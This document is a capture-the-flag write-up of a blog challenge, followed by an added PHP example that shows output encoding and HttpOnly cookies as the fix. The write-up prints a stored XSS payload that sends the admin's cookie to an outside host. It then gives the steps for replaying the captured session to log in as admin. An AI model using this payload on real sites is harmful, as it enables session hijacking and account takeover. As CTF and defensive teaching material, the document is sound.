Description:
A friend of mine has stolen my cat's picture on his blog. I want to log in as admin user on his blog. Do you have any idea? The Blog

Solution:
1. Access the blog and find the input fields (user, comment, captcha). The user and comment fields are vulnerable to Cross-site Scripting (XSS).
2. The description says "want to login as admin", so I wrote custom JavaScript to steal the admin's cookie and put it in a comment:
<script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' + encodeURI(document.cookie);</script>
3. Wait a minute, then look for the cookie in my site's access log:
/icheernoom.php?cookies=PHPSESSID=515386866780b5f132fc96c02b3ddb82
4. "Login as admin": I guessed the admin page is /admin.php. It exists, but it redirects to /login.php. Access it again with the admin's cookie.
Flag: 1b7a60600d5731739c0e2115bd4ebf7c
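
The defensive counterpart to steps 1 to 3, as an added example that is not part of the original write-up or the challenge's code: the unencoded comment rendering that makes the stored XSS possible, beside output encoding and an HttpOnly session cookie. The function names, the markup and the sample comment are assumptions made for illustration.

```php
<?php
// Added example, not the challenge's source. Function names and markup are
// hypothetical; "user" and "comment" are the fields named in step 1.

// Vulnerable pattern: stored input is echoed into HTML unchanged, so a stored
// <script> element runs in the browser of whoever views the page (the admin).
function render_comment_vulnerable(string $user, string $comment): string {
    return "<div class=\"comment\"><b>$user</b>: $comment</div>";
}

// Hardened pattern: encode every stored value on output for the HTML context.
function render_comment_hardened(string $user, string $comment): string {
    $enc = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="comment"><b>' . $enc($user) . '</b>: '
         . $enc($comment) . '</div>';
}

// Session cookie flags (array form needs PHP 7.3+). HttpOnly keeps PHPSESSID
// out of document.cookie, so script injected into a page cannot read it.
function start_hardened_session(): void {
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // assumes the blog is served over HTTPS
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Constructed sample comment, run from the CLI to compare both renderings.
$stored = '<script>alert(document.cookie)</script>';
echo render_comment_vulnerable('guest', $stored), PHP_EOL; // markup is live
echo render_comment_hardened('guest', $stored), PHP_EOL;   // markup is inert text
```

Output encoding removes the injection point; HttpOnly limits the damage if another injection point is missed, because the session identifier is no longer readable from script.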